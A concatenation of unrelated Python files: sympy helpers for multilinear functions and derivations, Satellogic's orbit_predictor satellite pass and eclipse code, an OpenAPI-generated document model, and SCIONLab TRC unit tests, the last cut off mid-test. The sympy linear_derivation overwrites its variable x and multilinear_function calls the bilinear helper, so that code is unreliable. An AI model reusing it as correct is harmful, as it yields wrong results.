if isinstance(expr, Mul): # expr has single term
(coefs, bases) = expr.args_cnc()
if bases[0] != ONE_NC: # vector term to be projected
return Mul(*coefs) * bases[0]
else:
return S.Zero
elif isinstance(expr, Symbol): # base vector to be projected
if expr != ONE_NC:
return expr
else:
return S.Zero
elif isinstance(expr, Add): # expr has multiple terms
result = S.Zero
for arg in expr.args:
term = arg.args_cnc()
if term[1] != ONE_NC: # vector term to be projected
result += Mul(*term[0]) * term[1][0]
return result
def nc_substitue(expr, sub_dict):
(coefs, bases) = linear_expand(expr)
result = S.Zero
for (coef, base) in zip(coefs, bases):
if base != 1:
result += coef * sub_dict[base]
return result
def linear_function(expr, fct):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
f(expr) = expr_0 + expr_1*f(a_1) + ... + expr_n*f(a_n)
is returned
"""
if expr.is_commutative:
return expr
expr = expand(expr)
if isinstance(expr, Mul):
(coefs, bases) = expr.args_cnc()
return Mul(*coefs) * fct(bases[0])
elif isinstance(expr, Symbol):
return fct(expr)
elif isinstance(expr, Add):
result = S.Zero
for arg in expr.args:
term = arg.args_cnc()
if term[1] == []:
result += Mul(*term[0])
else:
result += Mul(*term[0]) * fct(term[1][0])
return result
def coef_function(expr, fct):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
f(expr) = fct(expr_0) + fct(expr_1)*a_1 + ... + fct(expr_n)*a_n
is returned
"""
expr = expand(expr)
if isinstance(expr, Mul):
(coefs, bases) = expr.args_cnc()
return fct(Mul(*coefs)) * bases[0]
elif isinstance(expr, Symbol):
if expr.is_commutative:
return fct(expr)
else:
return expr
elif isinstance(expr, Add):
result = S.Zero
for arg in expr.args:
term = arg.args_cnc()
if term[1] == []:
result += fct(Mul(*term[0]))
else:
result += fct(Mul(*term[0])) * fct(term[1][0])
return result
def bilinear_product(expr, fct):
"""
If a sympy 'Expr' is of the form:
expr = expr_ij*a_i*a_j or expr_0 or expr_i*a_i
where all the a_i are noncommuting symbols in basis and the expr's
are commuting expressions then
bilinear_product(expr) = expr_ij*fct(a_i, a_j)
bilinear_product(expr_0) = expr_0
bilinear_product(expr_i*a_i) = expr_i*a_i
"""
def bilinear_term(expr, fct):
if expr.is_zero:
return expr
if isinstance(expr, Mul): # bases in expr
(coefs, bases) = expr.args_cnc()
coef = Mul(*tuple(coefs))
if isinstance(bases[0], Pow): # base is a_i**2
args = bases[0].args
return coef * fct(args[0], args[0])
elif len(bases) == 1: # base is a_i
return expr
else: # base is a_i*a_j
return coef * fct(bases[0], bases[1])
elif isinstance(expr, Pow): # expr is a_i*a_i
args = expr.args
return fct(args[0], args[0])
elif isinstance(expr, Symbol):
return expr
else:
raise TypeError('!!!!Cannot compute bilinear_product for ' + str(expr) + '!!!!\n')
expr = expand(expand(expr))
if not isinstance(expr, Add):
return bilinear_term(expr, fct)
else:
result = S.Zero
for term in expr.args:
tmp = bilinear_term(term, fct)
result += tmp
return result
def multilinear_product(expr, fct):
"""
If a sympy 'Expr' is of the form:
expr = expr_i1i2...irj*a_i1*a_i2*...*a_ir or expr_0
where all the a_i are noncommuting symbols in basis and the expr's
are commuting expressions then
multilinear_product(expr) = expr_i1i2...ir*fct(a_i1, a_i2, ..., a_ir)
bilinear_product(expr_0) = expr_0
where fct() is defined for r <= n the total number of bases
"""
if expr.is_commutative: # no bases in expr
return expr
if isinstance(expr, Mul): # bases in expr
(coefs, bases) = expr.args_cnc()
if len(coefs) == 0: # expr_ij = 1
coefs = [S.One]
coef = Mul(*tuple(coefs))
new_bases = []
for base in bases:
if isinstance(base, Pow):
args = base.args
new_bases += args[1] * [args[0]]
else:
new_bases.append(base)
return coef * fct(new_bases)
def bilinear_function(expr, fct):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n + expr_11*a_1*a_1
+ ... + expr_ij*a_i*a_j + ... + expr_nn*a_n*a_n
where all the a_j are noncommuting symbols in basis then
bilinear_function(expr) = bilinear_product(expr_0) + bilinear_product(expr_1*a_1) + ... + bilinear_product(expr_n*a_n)
+ bilinear + product(expr_11*a_1*a_1) + ... + bilinear_product(expr_nn*a_n*a_n)
"""
if expr.is_commutative:
return expr
expr = expand(expr)
if isinstance(expr, (Mul, Pow, Symbol)): # only one additive term
return bilinear_product(expr, fct)
elif isinstance(expr, Add): # multiple additive terms
result = S.Zero
for arg in expr.args:
result += bilinear_product(arg, fct)
return result
def multilinear_function(expr, fct):
"""
If a sympy 'Expr' is of the form summation convention):
expr = expr_0 + Sum{0 < r <= n}{expr_i1i2...ir*a_i1*a_i2*...*a_ir}
where all the a_j are noncommuting symbols in basis then and the
dimension of the basis in n then
bilinear_function(expr) = multilinear_product(expr_0)
+ Sum{0<r<=n}multilinear_product(expr_i1i2...ir*a_i1*a_i2*...*a_ir)
"""
if expr.is_commutative:
return expr
expr = expand(expr)
if isinstance(expr, (Mul, Pow, Symbol)): # only one additive term
return bilinear_product(expr, fct)
elif isinstance(expr, Add): # multiple additive terms
result = S.Zero
for arg in expr.args:
result += bilinear_product(arg, fct)
return result
def linear_derivation(expr, fct, x):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
linear_drivation(expr) = diff(expr_0, x) + diff(expr_1, x)*a_1 + ...
+ diff(expr_n, x)*a_n + expr_1*fct(a_1, x) + ...
+ expr_n*fct(a_n, x)
"""
if expr.is_commutative:
return diff(expr, x)
expr = expand(expr)
if isinstance(expr, Mul):
x = (coefs, bases) = expr.args_cnc()
coef = Mul(*coefs)
return diff(coef, x) * bases[0] + coef * fct(bases[0], x)
elif isinstance(expr, Symbol):
return fct(expr, x)
elif isinstance(expr, Add):
result = S.Zero
for arg in expr.args:
term = arg.args_cnc()
coef = Mul(*term[0])
if term[1] == []:
result += diff(coef, x)
else:
result += diff(coef, x) * term[1][0] + coef * fct(term[1][0], x)
return result
def product_derivation(F, fct, x):
"""
If a sympy 'Expr' is of the form:
expr = expr_0*a_1*...*a_n
where all the a_j are noncommuting symbols in basis then
product_derivation(expr) = diff(expr_0, x)*a_1*...*a_n
+ expr_0*(fct(a_1, x)*a_2*...*a_n + ...
+ a_1*...*a_(i-1)*fct(a_i, x)*a_(i + 1)*...*a_n + ...
+ a_1*...*a_(n-1)*fct(a_n, x))
"""
if F.is_commutative:
return diff(F, x)
elif isinstance(F, Mul):
(coefs, bases) = F.args_cnc()
coef = Mul(*coefs)
dcoef = diff(coef, x)
if len(bases) == 1:
return dcoef * bases[0] + coef * fct(bases[0], x)
else:
result = dcoef * Mul(*bases)
for ib in range(len(bases)):
result += coef * Mul(*bases[:ib]) * fct(bases[ib], x) * Mul(*bases[ib + 1:])
return result
elif isinstance(F, Symbol):
return fct(F, x)
def multilinear_derivation(F, fct, x):
"""
If a sympy 'Expr' is of the form (summation convention):
expr = expr_0 + expr_i1i2...ir*a_i1*...*a_ir
where all the a_j are noncommuting symbols in basis then
dexpr = diff(expr_0, x) + d(expr_i1i2...ir*a_i1*...*a_ir)
is returned where d() is the product derivation
"""
if F.is_commutative:
return diff(F, x)
elif isinstance(F, Mul) or isinstance(F, Symbol):
return product_derivation(F, fct, x)
elif isinstance(F, Add):
result = S.Zero
for term in F.args:
result += product_derivation(term, fct, x)
return result
def numpy_matrix(M):
if not numpy_loaded:
raise ImportError('Cannot use "numpy_matrix" since "numpy" is not loaded')
Mlst = M.tolist()
nrows = len(Mlst)
ncols = len(Mlst[0])
for irow in range(nrows):
for icol in range(ncols):
try:
Mlst[irow][icol] = float(Mlst[irow][icol])
except ValueError:
raise TypeError('In Matrix:\n%s\nCannot convert %s to python float.' % (M, Mlst[irow][icol]))
return matrix(Mlst)
|
# MIT License
#
# Copyright (c) 2017 Satellogic SA
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime as dt
import logging
import warnings
from collections import namedtuple
from math import pi, degrees
import numpy as np
try:
from scipy.optimize import brentq, minimize_scalar
except ImportError:
warnings.warn('scipy module was not found, some features may not work properly.',
ImportWarning)
from orbit_predictor.constants import MU_E
from orbit_predictor.exceptions import NotReachable
from orbit_predictor import coordinate_systems
from orbit_predictor.keplerian import rv2coe
from orbit_predictor.utils import (
angle_between,
reify,
vector_norm,
gstime_from_datetime,
get_shadow,
get_sun,
eclipse_duration,
get_satellite_minus_penumbra_verticals,
)
from .pass_iterators import ( # noqa: F401
LocationPredictor,
PredictedPass,
)
logger = logging.getLogger(__name__)
ONE_SECOND = dt.timedelta(seconds=1)
def round_datetime(dt_):
return dt_
class Position(namedtuple(
"Position", ['when_utc', 'position_ecef', 'velocity_ecef', 'error_estimate'])):
@reify
def position_llh(self):
"""Latitude (deg), longitude (deg), altitude (km)."""
return coordinate_systems.ecef_to_llh(self.position_ecef)
@reify
def osculating_elements(self):
"""Osculating Keplerian orbital elements.
Semimajor axis (km), eccentricity, inclination (deg),
right ascension of the ascending node or RAAN (deg),
argument of perigee (deg), true anomaly (deg).
"""
gmst = gstime_from_datetime(self.when_utc)
position_eci = coordinate_systems.ecef_to_eci(self.position_ecef, gmst)
velocity_eci = coordinate_systems.ecef_to_eci(self.velocity_ecef, gmst)
# Convert position to Keplerian osculating elements
p, ecc, inc, raan, argp, ta = rv2coe(
MU_E, np.array(position_eci), np.array(velocity_eci)
)
# Transform to more familiar semimajor axis
sma = p / (1 - ecc ** 2)
# NOTE: rv2coe already does % (2 * np.pi)
# but under some circumstances this might require another pass,
# see https://github.com/satellogic/orbit-predictor/pull/106#issuecomment-730177598
return sma, ecc, degrees(inc), degrees(raan), degrees(argp), degrees(ta) % 360
class Predictor:
@property
def sate_id(self):
raise NotImplementedError
def propagate_eci(self, when_utc=None):
raise NotImplementedError
def get_position(self, when_utc=None):
raise NotImplementedError("You have to implement it!")
def get_shadow(self, when_utc=None):
"""Gives illumination at given time (2 for illuminated, 1 for penumbra, 0 for umbra)."""
if when_utc is None:
when_utc = dt.datetime.utcnow()
return get_shadow(
self.get_position(when_utc).position_ecef,
when_utc
)
def get_normal_vector(self, when_utc=None):
"""Gets unitary normal vector (orthogonal to orbital plane) at given time."""
if when_utc is None:
when_utc = dt.datetime.utcnow()
position, velocity = self.propagate_eci(when_utc)
orbital_plane_normal = np.cross(position, velocity)
return orbital_plane_normal / vector_norm(orbital_plane_normal)
def get_beta(self, when_utc=None):
"""Gets angle between orbital plane and Sun direction (beta) at given time, in degrees."""
if when_utc is None:
when_utc = dt.datetime.utcnow()
# Here we calculate the complementary angle of beta,
# because we use the normal vector of the orbital plane
beta_comp = angle_between(
get_sun(when_utc),
self.get_normal_vector(when_utc)
)
# We subtract from 90 degrees to return the real beta angle
return 90 - beta_comp
class CartesianPredictor(Predictor):
def _propagate_ecef(self, when_utc=None):
"""Return position and velocity in the given date using ECEF coordinate system."""
if when_utc is None:
when_utc = dt.datetime.utcnow()
position_eci, velocity_eci = self.propagate_eci(when_utc)
gmst = gstime_from_datetime(when_utc)
position_ecef = coordinate_systems.eci_to_ecef(position_eci, gmst)
velocity_ecef = coordinate_systems.eci_to_ecef(velocity_eci, gmst)
return position_ecef, velocity_ecef
@reify
def mean_motion(self):
"""Mean motion, in radians per minute"""
raise NotImplementedError
@reify
def period(self):
"""Orbital period, in minutes"""
return 2 * pi / self.mean_motion
def get_position(self, when_utc=None):
"""Return a Position namedtuple in ECEF coordinate system"""
if when_utc is None:
when_utc = dt.datetime.utcnow()
position_ecef, velocity_ecef = self._propagate_ecef(when_utc)
return Position(when_utc=when_utc, position_ecef=position_ecef,
velocity_ecef=velocity_ecef, error_estimate=None)
def get_only_position(self, when_utc=None):
"""Return a tuple in ECEF coordinate system"""
return self.get_position(when_utc).position_ecef
def get_eclipse_duration(self, when_utc=None, tolerance=1e-1):
"""Gets eclipse duration at given time, in minutes"""
ecc = self.get_position(when_utc).osculating_elements[1]
if ecc > tolerance:
raise NotImplementedError("Non circular orbits are not supported")
beta = self.get_beta(when_utc)
return eclipse_duration(beta, self.period)
def passes_over(self, location, when_utc, limit_date=None, max_elevation_gt=0, aos_at_dg=0,
location_predictor_class=LocationPredictor, tolerance_s=1.0):
return location_predictor_class(location, self, when_utc, limit_date,
max_elevation_gt, aos_at_dg, tolerance_s=tolerance_s)
def get_next_pass(self, location, when_utc=None, max_elevation_gt=5,
aos_at_dg=0, limit_date=None,
location_predictor_class=LocationPredictor, tolerance_s=1.0):
"""Return a PredictedPass instance with the data of the next pass over the given location
location_llh: point on Earth we want to see from the satellite.
when_utc: datetime UTC after which the pass is calculated, default to now.
max_elevation_gt: filter passes with max_elevation under it.
aos_at_dg: This is if we want to start the pass at a specific elevation.
The next pass with a LOS strictly after when_utc will be returned,
possibly the current pass.
"""
if when_utc is None:
when_utc = dt.datetime.utcnow()
for pass_ in self.passes_over(location, when_utc, limit_date,
max_elevation_gt=max_elevation_gt,
aos_at_dg=aos_at_dg,
location_predictor_class=location_predictor_class,
tolerance_s=tolerance_s):
return pass_
else:
raise NotReachable('Propagation limit date exceeded')
def eclipses_since(self, when_utc=None, limit_date=None):
"""
An iterator that yields all eclipses start and end times between
when_utc and limit_date.
The next eclipse with a end strictly after when_utc will be returned,
possibly the current eclipse.
The last eclipse returned starts before limit_date, but it can end
strictly after limit_date.
No circular orbits are not supported, and will raise NotImplementedError.
"""
def _get_illumination(t):
my_start = start + dt.timedelta(seconds=t)
result = get_satellite_minus_penumbra_verticals(
self.get_only_position(my_start),
my_start
)
return result
if when_utc is None:
when_utc = dt.datetime.utcnow()
orbital_period_s = self.period * 60
# A third of the orbit period is used as the base window of the search.
# This window ensures the function get_satellite_minus_penumbra_verticals
# will not have more than one local minimum (one in the illuminated phase and
# the other in penumbra).
base_search_window_s = orbital_period_s / 3
start = when_utc
while limit_date is None or start < limit_date:
# a minimum negative value is aproximatelly the middle point of the eclipse
minimum_illumination = minimize_scalar(
_get_illumination,
bounds=(0, base_search_window_s),
method="bounded",
options={"xatol": 1e-2},
)
eclipse_center_candidate_delta_s = minimum_illumination.x
# If found a minimum that is not illuminated, there is an eclipse here
if _get_illumination(eclipse_center_candidate_delta_s) < 0:
# Search now both zeros to get the start and end of the eclipse
# We know that in (0, base_search_window_s) there is a minimum with negative value,
# and also on the opposite side of the eclipse we expect sunlight,
# therefore we already have two robust bracketing intervals
eclipse_start_delta_s = brentq(
_get_illumination,
eclipse_center_candidate_delta_s - orbital_period_s / 2,
eclipse_center_candidate_delta_s,
xtol=1e-2,
full_output=False,
)
eclipse_end_delta_s = brentq(
_get_illumination,
eclipse_center_candidate_delta_s,
eclipse_center_candidate_delta_s + orbital_period_s / 2,
xtol=1e-2,
full_output=False,
)
eclipse_start = start + dt.timedelta(seconds=eclipse_start_delta_s)
eclipse_end = start + dt.timedelta(seconds=eclipse_end_delta_s)
yield eclipse_start, eclipse_end
start = eclipse_end + dt.timedelta(seconds=base_search_window_s)
else:
start += dt.timedelta(seconds=base_search_window_s)
class GPSPredictor(Predictor):
pass
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from harpocrates_server.models.base_model_ import Model
from harpocrates_server.models.predicted_classification import PredictedClassification
from harpocrates_server.models.text_content import TextContent
from harpocrates_server import util
from harpocrates_server.models.predicted_classification import PredictedClassification # noqa: E501
from harpocrates_server.models.text_content import TextContent # noqa: E501
class Document(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, name=None, document_id=None, text_split_granularity=None, predicted_classification=None, text_contents=None): # noqa: E501
"""Document - a model defined in OpenAPI
:param name: The name of this Document. # noqa: E501
:type name: str
:param document_id: The document_id of this Document. # noqa: E501
:type document_id: str
:param text_split_granularity: The text_split_granularity of this Document. # noqa: E501
:type text_split_granularity: str
:param predicted_classification: The predicted_classification of this Document. # noqa: E501
:type predicted_classification: PredictedClassification
:param text_contents: The text_contents of this Document. # noqa: E501
:type text_contents: List[TextContent]
"""
self.openapi_types = {
'name': str,
'document_id': str,
'text_split_granularity': str,
'predicted_classification': PredictedClassification,
'text_contents': List[TextContent]
}
self.attribute_map = {
'name': 'name',
'document_id': 'documentId',
'text_split_granularity': 'textSplitGranularity',
'predicted_classification': 'predictedClassification',
'text_contents': 'textContents'
}
self._name = name
self._document_id = document_id
self._text_split_granularity = text_split_granularity
self._predicted_classification = predicted_classification
self._text_contents = text_contents
@classmethod
def from_dict(cls, dikt) -> 'Document':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The document of this Document. # noqa: E501
:rtype: Document
"""
return util.deserialize_model(dikt, cls)
@property
def name(self):
"""Gets the name of this Document.
:return: The name of this Document.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Document.
:param name: The name of this Document.
:type name: str
"""
self._name = name
@property
def document_id(self):
"""Gets the document_id of this Document.
:return: The document_id of this Document.
:rtype: str
"""
return self._document_id
@document_id.setter
def document_id(self, document_id):
"""Sets the document_id of this Document.
:param document_id: The document_id of this Document.
:type document_id: str
"""
if document_id is None:
raise ValueError("Invalid value for `document_id`, must not be `None`") # noqa: E501
self._document_id = document_id
@property
def text_split_granularity(self):
"""Gets the text_split_granularity of this Document.
Granularity of the split of the document's content # noqa: E501
:return: The text_split_granularity of this Document.
:rtype: str
"""
return self._text_split_granularity
@text_split_granularity.setter
def text_split_granularity(self, text_split_granularity):
"""Sets the text_split_granularity of this Document.
Granularity of the split of the document's content # noqa: E501
:param text_split_granularity: The text_split_granularity of this Document.
:type text_split_granularity: str
"""
allowed_values = ["document", "paragraph", "line"] # noqa: E501
if text_split_granularity not in allowed_values:
raise ValueError(
"Invalid value for `text_split_granularity` ({0}), must be one of {1}"
.format(text_split_granularity, allowed_values)
)
self._text_split_granularity = text_split_granularity
@property
def predicted_classification(self):
"""Gets the predicted_classification of this Document.
:return: The predicted_classification of this Document.
:rtype: PredictedClassification
"""
return self._predicted_classification
@predicted_classification.setter
def predicted_classification(self, predicted_classification):
"""Sets the predicted_classification of this Document.
:param predicted_classification: The predicted_classification of this Document.
:type predicted_classification: PredictedClassification
"""
self._predicted_classification = predicted_classification
@property
def text_contents(self):
"""Gets the text_contents of this Document.
list of textContent object representing the content of the document # noqa: E501
:return: The text_contents of this Document.
:rtype: List[TextContent]
"""
return self._text_contents
@text_contents.setter
def text_contents(self, text_contents):
"""Sets the text_contents of this Document.
list of textContent object representing the content of the document # noqa: E501
:param text_contents: The text_contents of this Document.
:type text_contents: List[TextContent]
"""
if text_contents is None:
raise ValueError("Invalid value for `text_contents`, must not be `None`") # noqa: E501
self._text_contents = text_contents
|
# Copyright 2020 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timedelta
from django.db import transaction
from django.test import TestCase
from scionlab.scion import as_ids, certs, trcs, pkicommand
from scionlab.models.core import ISD, AS
from scionlab.models.pki import Key, Certificate
from scionlab.models.trc import TRC, _coreas_certificates
_ASID_1 = 'ff00:0:1'
_ASID_2 = 'ff00:0:2'
_ASID_3 = 'ff00:0:3'
class TRCTests(TestCase):
def setUp(self):
self.isd1 = ISD.objects.create(isd_id=1, label='Test')
def test_get_previous(self):
trc1 = _create_TRC(self.isd1, 1, 1)
self.assertEqual(trc1.predecessor_trc_or_none(), trc1)
trc2 = _create_TRC(self.isd1, 2, 1)
self.assertEqual(trc2.predecessor_trc_or_none(), trc1)
trc4 = _create_TRC(self.isd1, 4, 1)
self.assertIsNone(trc4.predecessor_trc_or_none())
def test_get_voters_indices(self):
as110 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
Key.objects.create_core_keys(as110)
Certificate.objects.create_core_certs(as110)
prev = _create_TRC(self.isd1, 1, 1)
c0 = Certificate.objects.create_voting_regular_cert(as110)
c1 = Certificate.objects.create_voting_regular_cert(as110)
c2 = Certificate.objects.create_voting_regular_cert(as110)
c3 = Certificate.objects.create_voting_regular_cert(as110)
c4 = Certificate.objects.create_voting_regular_cert(as110)
prev.certificates.add(c0, c1, c2, c3, c4)
prev.save()
trc = _create_TRC(self.isd1, 2, 1)
trc.certificates.add(c0, c1, c2, c3, c4)
trc.votes.add(c1)
self.assertEqual(_get_voters_indices(trc), [1])
trc.votes.add(c4)
self.assertEqual(_get_voters_indices(trc), [1, 4])
# insert votes in a different order
trc.votes.clear()
trc.votes.add(c3)
trc.votes.add(c4)
trc.votes.add(c1)
self.assertEqual(_get_voters_indices(trc), [1, 3, 4])
def test_certificates_indices_after_delete(self):
as110 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
as210 = _create_AS(self.isd1, 'ff00:0:210', is_core=True)
Key.objects.create_core_keys(as110)
Key.objects.create_core_keys(as210)
Certificate.objects.create_core_certs(as110)
Certificate.objects.create_core_certs(as210)
prev = _create_TRC(self.isd1, 1, 1)
c0 = Certificate.objects.create_voting_sensitive_cert(as110)
c1 = Certificate.objects.create_voting_regular_cert(as110)
c2 = Certificate.objects.create_issuer_root_cert(as110)
c3 = Certificate.objects.create_voting_sensitive_cert(as210)
c4 = Certificate.objects.create_voting_regular_cert(as210)
c5 = Certificate.objects.create_issuer_root_cert(as210)
prev.certificates.add(c0, c1, c2, c3, c4, c5)
prev.save()
trc = _create_TRC(self.isd1, 2, 1)
trc.certificates.add(c0, c1, c2, c3, c4)
trc.votes.add(c0, c1, c3, c4)
trc.save()
self.assertEqual(_get_voters_indices(trc), [0, 1, 3, 4]) # normal
for c in [c0, c1, c2, c3, c4, c5]:
with transaction.atomic(): # transaction of the test would be broken otherwise
self.assertRaises(RuntimeError, c.delete)
# and the indices of the voters never changed
self.assertEqual(_get_voters_indices(trc), [0, 1, 3, 4])
prev.delete()
c5.delete() # does not raise exception, not part of a TRC anymore
class TRCUpdateTests(TestCase):
def setUp(self):
self.isd1 = ISD.objects.create(isd_id=1, label='Test')
def test_update_regular_possible(self):
trc1 = _create_TRC(self.isd1, 1, 1)
self.assertIsNotNone(trc1.check_regular_update_error()) # no previous TRC
self.assertIn('no previous', trc1.check_regular_update_error())
as1 = _create_AS(self.isd1, 'ff00:0:110', is_core=True)
Key.objects.create_core_keys(as1)
Certificate.objects.create_core_certs(as1)
self._reset_core_ases(trc1)
trc2 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=2)
trc2.save()
self._reset_core_ases(trc2)
self.assertIsNone(trc2.check_regular_update_error())
# create new voter
as2 = _create_AS(self.isd1, 'ff00:0:210', is_core=True)
Key.objects.create_core_keys(as2)
Certificate.objects.create_core_certs(as2)
self._reset_core_ases(trc2)
self.assertIsNotNone(trc2.check_regular_update_error()) # quorum changed
self.assertIn('quorum', trc2.check_regular_update_error())
trc2.quorum = trc1.quorum # force quorum to be the same
trc2.save()
self.assertIsNotNone(trc2.check_regular_update_error()) # core section changed
self.assertIn('core section', trc2.check_regular_update_error())
trc2.quorum += 1 # reinstate the correct quorum
trc2.save()
# sanity check
trc3 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=3)
trc3.save()
self._reset_core_ases(trc3)
self.assertIsNone(trc3.check_regular_update_error())
# change sensitive voting cert (only the cert suffices)
Certificate.objects.create_voting_sensitive_cert(as1)
trc4 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=4)
trc4.save()
self._reset_core_ases(trc4)
self.assertIsNotNone(trc4.check_regular_update_error()) # sensitive voting different
self.assertIn('sensitive vote', trc4.check_regular_update_error())
# sanity check
trc5 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=5)
trc5.save()
self._reset_core_ases(trc5)
self.assertIsNone(trc5.check_regular_update_error())
# change number of included certificates
trc6 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=6)
trc6.save()
self._reset_core_ases(trc6)
trc6.certificates.remove(trc6.certificates.filter(key__usage=Key.ISSUING_ROOT).last())
self.assertIsNotNone(trc6.check_regular_update_error())
self.assertIn('different number', trc6.check_regular_update_error())
# change regular voting certificate, not part of voters
self._reset_core_ases(trc6)
trc7 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=7)
trc7.save()
self._reset_core_ases(trc7)
self.assertIsNone(trc7.check_regular_update_error())
cert = trc7.certificates.filter(key__usage=Key.TRC_VOTING_REGULAR).last()
trc7.certificates.remove(cert)
as_ = cert.key.AS
trc7.certificates.add(Certificate.objects.create_voting_regular_cert(as_))
trc7.save()
self.assertIsNotNone(trc7.check_regular_update_error())
self.assertIn('regular voting certificate', trc7.check_regular_update_error())
self.assertIn('not part of voters', trc7.check_regular_update_error())
# change regular voting certificate, make it part of voters
trc7.votes.add(cert)
self.assertIsNone(trc7.check_regular_update_error())
# change root certificate, not part of voters
trc8 = TRC(isd=self.isd1, not_before=datetime.utcnow(), not_after=datetime.utcnow(),
base_version=1, serial_version=8)
trc8.save()
self._reset_core_ases(trc8)
self.assertIsNone(trc8.check_regular_update_error())
cert = trc8.certificates.filter(key__usage=Key.ISSUING_ROOT).last()
trc8.certificates.remove(cert)
as_ = cert.key.AS
cert = Certificate.objects.create_issuer_root_cert(as_)
trc8.certificates.add(cert)
trc8.save()
self.assertIsNotNone(trc8.check_regular_update_error())
self.assertIn('root certificate', trc8.check_regular_update_error())
self.assertIn('not sign', trc8.check_regular_update_error())
# change root certificate, make it part of voters
trc8.signatures.add(cert)
self.assertIsNone(trc8.check_regular_update_error())
def _reset_core_ases(self, trc):
trc.core_ases.clear()
trc.core_ases.set(trc.isd.ases.filter(is_core=True))
trc.quorum = trc.core_ases.count() // 2 + 1
# insert all core AS certificates:
trc.certificates.clear()
trc.certificates.add(*_coreas_certificates(trc.isd))
trc.save()
class TRCCreationTests(TestCase):
def setUp(self):
self.isd1 = ISD.objects.create(isd_id=1, label='Test')
def test_create_empty(self):
self.assertRaises(Exception, # no core ases
TRC.objects.create,
isd=self.isd1)
def test_create_first(self):
self._create_ases()
trc = TRC.objects.create(self.isd1)
_check_trc(trc, trc)
self.assertEqual(trc.serial_version, trc.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), trc)
self.assertFalse(trc.votes.exists())
self.assertEqual(trc.quorum, 2)
def test_create_regular_update(self):
self._create_ases()
prev = TRC.objects.create(self.isd1)
trc = TRC.objects.create(self.isd1)
_check_trc(trc, prev)
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
self.assertEqual(trc.quorum, prev.quorum)
def test_create_sensitive_update(self):
self._create_ases()
prev = TRC.objects.create(self.isd1)
# add another core AS. This forces a sensitive update.
as4 = _create_AS(self.isd1, 'ff00:0:4', is_core=True)
Key.objects.create_all_keys(as4)
Certificate.objects.create_all_certs(as4)
trc = TRC.objects.create(self.isd1)
_check_trc(trc, prev)
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
self.assertEqual(trc.quorum, prev.quorum)
def test_delete_one_core_as(self):
self._create_ases()
prev = TRC.objects.create(self.isd1)
# remove one core AS
AS.objects.filter(is_core=True, isd=self.isd1).first().delete()
# deleting a core As triggers a generation of a TRC. Get that TRC:
trc = TRC.objects.latest()
# check the trc chain
_check_trc(trc, prev)
# check it's a sensitive update
self.assertEqual(trc.serial_version, prev.serial_version + 1)
self.assertEqual(trc.base_version, prev.base_version)
self.assertEqual(trc.predecessor_trc_or_none(), prev)
self.assertTrue(trc.votes.exists())
self.assertNotEqual(trc.quorum, prev.quorum)
# Check valid latest CP AS certificates regenerated, core
some_core = AS.objects.filter(is_core=True, isd=self.isd1).first()
cert_cp_as = some_core.certificates_latest().filter(key__usage=Key.CP_AS).first()
loaded_chain = cert_cp_as.format_certfile()
certs.verify_cp_as_chain(loaded_chain, trcs.decode_trc(trc.trc))
some_core.validate_crypto()
# Check valid latest CP AS certificates regenerated, non-core
any_none_core = AS.objects.filter(is_core=False, isd=self.isd1).first()
cert_cp_as = any_none_core.certificates_latest().filter(key__usage=Key.CP_AS).first()
